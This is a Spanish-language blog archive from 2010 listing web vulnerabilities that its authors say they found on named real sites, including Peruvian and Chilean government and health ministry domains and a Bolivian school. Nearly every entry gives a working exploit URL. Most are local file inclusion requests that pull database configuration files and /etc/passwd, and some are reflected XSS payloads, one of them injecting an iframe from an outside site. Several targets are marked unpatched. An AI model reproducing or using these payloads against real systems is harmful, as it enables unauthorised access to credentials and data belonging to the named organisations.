janito24

Archive for 22 enero 2010|Monthly archive page

Vulnerabilidad en localhost

In Uncategorized on enero 22, 2010 at 7:13 am

Sitio web: http://localhost/ <– Pagina de inicio Wamp
Descubridor: janito24
URL del aviso:
Fecha de descubrimiento: 22 de enero 2010
Fecha de notificación: 22 de enero 2010
Fecha de publicación: 22 de enero 2010
Arreglado: No
Información adicional: XSS en la variable lang.
http://localhost/?lang=%22%3E%3Ch3%3Exss%3C/h3%3E

Anuncios

Vulnerabilidad en hospitalvitarte.gob.pe

In Uncategorized on enero 21, 2010 at 6:58 am

Sitio web: http://www.hospitalvitarte.gob.pe/ <– Ministerio de salud
Descubridor: Ari-Slash
URL del aviso: http://www.hospitalvitarte.gob.pe/
Fecha de descubrimiento: 18 de enero 2010
Fecha de notificación:
Fecha de publicación: 19 de enero 2010
Arreglado: No
Vulnerabilidad: LFI
Código:
http://www.hospitalvitarte.gob.pe/download.php?url=../lib/DAL/db.class.php

saludos

Vulnerabilidad en ceplag.edu.bo

In Uncategorized on enero 21, 2010 at 6:56 am

Sitio web: www.ceplag.edu.bo
Descubridor: Ari-Slash
Fecha de descubrimiento: 18 de enero de 2010
Fecha de notificación: 18 de enero de 2010
Fecha de publicación: 18 de enero de 2010
Arreglado: No
Vulnerabilidad: LFI
Código:
http://www.ceplag.edu.bo/php/descargar.php?file=/Connections/link.php

Vulnerabilidad en lostambos.com.pe

In Uncategorized on enero 21, 2010 at 6:54 am

Sitio web: lostambos.com.pe
Descubridor: Ari-Slash y el-pollo
Fecha de descubrimiento: 17 de enero de 2010
Fecha de notificación: 17 de enero de 2010
Fecha de publicación: 17 de enero de 2010
Arreglado: Si 18 de Enero de 2010 (eliminaron el arhcivo download.php xD)
Vulnerabilidad: LFI
Código:
http://www.lostambos.com.pe/download.php?f=../inc.config.php

saludos

Vulnerabilidad en minagri.gob.cl

In Uncategorized on enero 21, 2010 at 6:52 am

Sitio web: http://www.minagri.gob.cl/
Descubridor: Ari-Slash
Fecha de descubrimiento: 16 de enero de 2010
Fecha de notificación: 16 de enero de 2010
Fecha de publicación: 16 de enero de 2010
Arreglado: si 18 de enero de 2010 (ni siquiera un gracias ¬¬ )
Vulnerabilidad: LFI
Código:
http://www.minagri.gob.cl/tips/descargar.php?file=../include/php/conectaBD.php
http://www.minagri.gob.cl/tips/descargar.php?file=../../../../etc/passwd

Vulnerabilidad: XSS
Código:
http://www.minagri.gob.cl/buscar.php?txt_busca=d%22%3E%3Ciframe%20src=http://skydrive.cl/foro%3E%3C/iframe%3E%3C